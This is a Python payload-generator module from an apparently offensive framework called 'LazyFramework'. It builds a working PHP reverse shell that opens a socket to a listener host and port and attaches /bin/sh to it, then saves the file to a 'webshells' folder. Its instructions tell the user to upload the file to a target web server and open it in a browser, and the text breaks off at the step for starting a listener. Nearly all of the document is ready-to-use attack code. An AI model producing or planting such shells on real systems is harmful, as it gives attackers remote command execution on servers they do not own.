# modules/payload/web/php_reverse_shell.py
import textwrap, os, random
from pathlib import Path
from rich.console import Console
from rich.panel import Panel
from rich.syntax import Syntax
from rich.markdown import Markdown

console = Console()

MODULE_INFO = {
    "name": "PHP Reverse Shell",
    "description": "Generate PHP reverse shell with VS Code-like editor",
    "author": "LazyFramework",
    "platform": "php",
    "arch": "multi",
    "rank": "Excellent"
}

OPTIONS = {
    "LHOST": {"description": "Listener IP", "required": True, "default": "192.168.1.100"},
    "LPORT": {"description": "Listener Port", "required": True, "default": 4444},
    "FILENAME": {"description": "Save as (e.g. shell.php)", "required": False, "default": "shell.php"}
}

# === PHP Code Template ===
PHP_CODE = '''<?php
// Simple PHP Reverse Shell
// Generated by LazyFramework

set_time_limit(0);
$ip = '{LHOST}';
$port = {LPORT};

$sock = fsockopen($ip, $port);
if (!$sock) {
    die("Connection failed!");
}

$proc = proc_open('/bin/sh -i', [
    0 => ['pipe', 'r'],  // stdin
    1 => $sock,          // stdout -> socket
    2 => $sock           // stderr -> socket
], $pipes);

while ($sock && !feof($sock)) {
    $input = fread($sock, 1024);
    if ($input) {
        fwrite($pipes[0], $input);
    }
}
fclose($pipes[0]);
?>
'''

def run(session, options):
    lhost = options["LHOST"]
    lport = int(options["LPORT"])
    filename = options.get("FILENAME", "shell.php")

    # Generate code
    code = PHP_CODE.format(LHOST=lhost, LPORT=lport)

    # Save to file
    save_dir = Path("webshells")
    save_dir.mkdir(exist_ok=True)
    filepath = save_dir / filename
    filepath.write_text(code)

    # === Syntax Highlighting ===
    syntax = Syntax(
        code,
        "php",
        theme="monokai",
        line_numbers=True,
        word_wrap=False,
        indent_guides=True,
        background_color="#1e1e1e"
    )

    # === Editor UI Panel ===
    editor_panel = Panel(
        syntax,
        title=f"[bold magenta]PHP Reverse Shell[/] - [cyan]{filename}[/]",
        subtitle=f"[green]Saved:[/] {filepath}  |  [yellow]Copy[/]  [blue]Download[/]",
        border_style="bright_blue",
        padding=(1, 2)
    )

    # === Instructions ===
    instructions = Markdown(f"""
### How to Use:
1. **Upload** `{filename}` ke target web server
2. **Access** via browser: `http://target.com/{filename}`
3. **Start listener**:
